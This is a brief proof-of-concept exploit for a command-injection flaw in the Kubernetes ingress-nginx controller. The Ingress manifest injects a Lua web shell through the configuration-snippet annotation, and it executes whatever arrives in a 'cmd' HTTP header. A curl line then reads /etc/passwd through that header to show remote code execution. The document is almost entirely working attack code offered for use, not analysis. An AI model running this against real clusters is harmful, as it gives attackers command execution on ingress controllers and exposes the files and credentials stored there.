Ingress nginx annotation injection causes arbitrary command execution
- Create Ingress (can be created without Service and Pod)
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: ingress-exploit
annotations:
kubernetes.io/ingress.class: "nginx"
nginx.ingress.kubernetes.io/configuration-snippet: |
more_set_headers "robinak"
proxy_pass http://upstream_balancer;
proxy_redirect off;
}
location /robinak/ { content_by_lua_block { local rsfile = io.popen(ngx.req.get_headers()["cmd"]);local rschar = rsfile:read("*all");ngx.say(rschar); } } location /fs/{
spec:
rules:
- host: robinak.me
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: exploit
port:
number: 80- Make request by specifying the public address of your Ingress NGINX controller:
curl -v -H 'Host: robinak.me' -H "cmd: cat /etc/passwd" http://IP/robinak/- Got RCE
